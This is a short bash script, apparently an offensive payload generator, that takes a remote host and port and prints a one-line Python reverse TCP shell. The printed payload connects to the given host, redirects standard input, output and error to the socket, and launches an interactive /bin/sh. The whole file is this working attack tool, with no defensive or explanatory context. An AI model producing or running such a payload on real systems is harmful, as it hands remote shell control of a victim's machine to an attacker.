
#!/bin/bash

function Craft_linux_python_reverse_shell(){

        if [ -z "$1" ] || [ -z "$2" ]
        then
                printf "Auto-gen Linux python reverse tcp shell\n"
                printf "Usage bash linux_python-reverse-tcp <rhost> <rport>\n"
                exit
        fi

        rhost="$1"
        rport="$2"

        printf "\n"
        printf "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$rhost\",$rport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
        printf "\n\n[\e[0;32m+\e[0m] Payload created.\n"

}

Craft_linux_python_reverse_shell "$1" "$2"
